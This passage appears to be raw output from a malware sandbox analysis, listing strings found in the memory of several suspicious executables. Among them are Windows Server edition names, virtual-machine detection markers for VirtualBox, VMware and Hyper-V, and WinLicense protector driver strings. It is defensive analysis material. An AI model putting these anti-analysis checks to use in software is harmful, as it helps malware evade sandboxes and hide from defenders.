Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: vmware
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: explorti.exe, explorti.exe, 00000007.00000002.2920362161.000000000050B000.00000040.00000001.01000000.00000007.sdmp, RoamingHJDBKJKFIE.exe, 0000000F.00000002.2581280707.0000000000E2B000.00000040.00000001.01000000.0000000D.sdmp, userKFHCAEGCBF.exe, 00000012.00000002.2598761608.0000000000DF9000.00000040.00000001.01000000.0000000E.sdmp, axplong.exe, 00000013.00000002.2624518320.0000000000349000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWk+IB
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8EA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Hyper-V (guest)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000005F6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000005F6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000005F6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: ~VirtualMachineTypes
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000005F6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000005F6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000005F6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: ]DLL_Loader_VirtualMachine
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000005F6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000005F6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000005F6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: 8NjcvPNvUr.exe, 00000000.00000002.1687078940.000000000044B000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1712195825.000000000050B000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000002.00000002.1715924134.000000000050B000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000007.00000002.2920362161.000000000050B000.00000040.00000001.01000000.00000007.sdmp, RoamingHJDBKJKFIE.exe, 0000000F.00000002.2581280707.0000000000E2B000.00000040.00000001.01000000.0000000D.sdmp, userKFHCAEGCBF.exe, 00000012.00000002.2598761608.0000000000DF9000.00000040.00000001.01000000.0000000E.sdmp, axplong.exe, 00000013.00000002.2624518320.0000000000349000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: 8ec8c5c339.exe, 0000000A.00000002.2721807225.00000000025D0000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareF
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2926586035.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2741806930.00000000024C7000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 0000000A.00000002.2721852651.0000000002639000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2626428785.00000238E8EA0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2643663526.000001F41410A000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 0000001E.00000002.2782069458.000000000272E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: firefox.exe, 00000018.00000002.2629600629.00000238F2FB4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645210207.000001F414514000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: 8ec8c5c339.exe, 00000008.00000002.2740205336.000000000249E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareJ
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: 8ec8c5c339.exe, 0000001E.00000002.2781993331.00000000026C0000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
